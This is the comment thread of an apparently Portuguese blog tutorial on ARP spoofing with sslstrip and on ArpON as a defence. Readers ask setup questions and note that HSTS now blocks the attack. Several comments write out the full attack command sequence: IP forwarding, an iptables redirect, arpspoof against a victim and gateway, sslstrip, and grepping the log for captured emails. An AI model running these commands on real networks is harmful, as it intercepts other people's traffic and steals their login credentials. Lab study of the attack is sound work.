29 Comentários

  1. Marcos 31 de dezembro de 2013 at 13:31 |

    Uma pergunta, se instalar o Arpon em um Firewall linux… como pode se configurar? ou apenas habilita as opções sem configurar os macs e ips?

    obs. É uma rede com mais de 40 pcs.

    Resposta
  2. Lucas 2 de janeiro de 2014 at 2:57 |

    Ola boa noite
    Marcos tenho uma duvida, neste artigo, onde eu consigo visualizar ou encontrar o aquivo que este comando cria cat sslstrip.log | grep email= ? Tive dificuldade e não prossegui.
    Desde já obrigdo

    Resposta
  3. Torfect 29 de março de 2014 at 21:56 |

    Como sempre bons artigos!

    Tenho uma dúvida,tipo vc colocou o mac e ip do windows 7 isso é pra proteger outros pcs na rede ou o seu próprio no caso o Kali linux que fez o procedimento?

    Resposta
  4. Baby 7 de julho de 2014 at 20:36 |

    Oi
    Tenho uma grande dúvida sobre o ArpON
    Na minha casa tem 4 computadores conectados,quando eu colocar os pcs da casa no filtro do ArpON eles serão apenas protegidos quando o meu estiver ligado ou não?
    E se eu colocar o meu próprio Kali nas regras tbm isso vai prejudicar nos meus testes contra outro pc de teste na minha rede?

    Resposta
  5. Paulo Roberto 12 de agosto de 2015 at 12:51 |

    Olá,
    Como consegue capturar informações do HTTPS através da porta 80?
    Abraço

    Resposta
  6. celso de oliveira 5 de janeiro de 2016 at 19:34 |

    Boa tarde no meu pc esta tanto erro
    olha o erro:
    16:53:19 – WARNING: eth0: no IPv4 address assigned

    DARPI Interrupt…

    17:25:38 – WARNING: eth0: no IPv4 address assigned
    só que eu estou usando wifi e não cabo.
    aguardo responda obrigado.

    Resposta
  7. Marcelo 7 de janeiro de 2016 at 18:26 |

    Porque no arquivo sslstrip não aparece o tráfego da coleta?

    Resposta
  8. Bazinga 17 de janeiro de 2016 at 18:36 |

    Oi, funciona em sites https também?

    Resposta
  9. Jonas 20 de fevereiro de 2016 at 21:05 |

    Olá Marcos,

    Obrigado por compartilhar seu conhecimento que a propósito é bem didático.

    Teste no Kali 2 e acho que terias que ajustar algo: rs

    *** Tirar aspas da primeira linha

    [email protected]:~# echo “1” > /proc/sys/net/ipv4/ip_forward
    bash: echo: write error: Invalid argument

    Linha abaixo no Kali 2 = ok

    [email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward

    Aqui precisa de mais um –

    [email protected]:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080
    Bad argument `–dport’
    Try `iptables -h’ or ‘iptables –help’ for more information.

    Adicionar —

    –dport

    –to-port

    Linha abaixo no Kali 2 = ok

    [email protected]:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080

    Resposta
  10. Jonas 20 de fevereiro de 2016 at 21:27 |

    Marcos,

    Duvida 🙂

    # cat sslstrip.log | grep email=

    Abri uma página do facebook e o comando acima nao listou nada… e dentro do .log tem algo mas nada sobre o email e login…

    Obrigado

    Resposta
  11. Marcos Fideles 1 de março de 2016 at 23:10 |

    Esse ataque não tem funcionando, “Firefox” “Chrome” tem barrado isso. OBS: ainda não testei com os demais 😀

    Resposta
  12. Igor 27 de julho de 2016 at 17:28 |

    Boa tarde Marcos Henrique, tudo bem?

    Estou com um problema em relação ao arpspoof. Eu montei um ambiente com uma VM Kali linux e uma VM windows 7.
    Quando realizo o arpspoof assim como vc ensinou entre o kali, windows e gateway, a conexão do windows (vítimia) cai.
    O que pode ser?

    ps: as máquinas estão com NAT e se pingam.

    Muito obrigado.

    Resposta
  13. Walber Felyppi 26 de setembro de 2016 at 2:35 |

    Consegui verificar o arquivo de log, mas n encontrei login nem nada, tentei em mais de um site de autenticação, utilizei internet explorer. O ArpOn não me trouxe nenhum log apesar de ativo.

    Resposta
    1. Maurício 30 de novembro de 2016 at 18:57 |

      O mesmo aconteceu comigo.

      Resposta
    2. Maurício 30 de novembro de 2016 at 18:58 |

      Tudo estava aparentemente funcionando. Abri o log e lá tinha diversas informações. Mas nenhuma relativa aos logins.

      Resposta
  14. Gustavo 11 de janeiro de 2017 at 17:41 |

    Isso se deve pois a maioria das grandes empresas estão implementando HSTS que impedem o ataque de SSLTrip que é basicamente um downgrade de HTTPS para HTTP mas ainda vai funcionar em sites pequenos

    Resposta
  15. […] E para a galerinha que pediu um exemplo prático, não ensinarei agora, porém deixarei um tutorial para […]

  16. Pedro 22 de fevereiro de 2017 at 23:18 |

    Olá Marcos, tudo bem?

    Dúvidas, o arquivo log parece estar encriptografado e nao consigo achar nada….rs… ?

    =====

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080

    arpspoof -i eth0 -t ip_alvo ip_router

    sslstrip -a -l 8080

    cat sslstrip.log | grep email=

    Resposta
  17. Diego Miguel 22 de março de 2017 at 1:26 |

    Olá Marcos, tudo bem?

    Ótimo artigo, ficou realmente muito bom.

    Mas tenho algumas dúvidas, essa técnica funciona em redes wifi WPA/WPA2, ou apenas em redes cabeadas?

    Resposta
  18. pedro 22 de junho de 2017 at 19:40 |

    Olá estou na maquina virtual box, na hora do comando arpspoof -i eth0 -t (ip da vitima) (meu ip) da esse erro arpspoof couldin’t arp for host (meu ip) me ajudem por favor!

    Resposta
    1. alemao cms 8 de julho de 2017 at 0:55 |

      o meu tbm fica dando esse erro, voce conseguiu arrumar?

      Resposta
  19. Knight 17 de janeiro de 2018 at 22:36 |

    O ataque funciona em rede externa? onde o IP da vítima será o IP Externo?

    Resposta
  20. Caique 10 de fevereiro de 2018 at 23:39 |

    Marcos,

    No passo 4, “arpspoof -i eth0 -t 10.10.10.134 10.10.2”.

    Teríamos que executar o arpspoof novamente, invertendo GW/ROUTER IP_VITIMA.

    Não?

    Resposta

Deixe um comentário

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.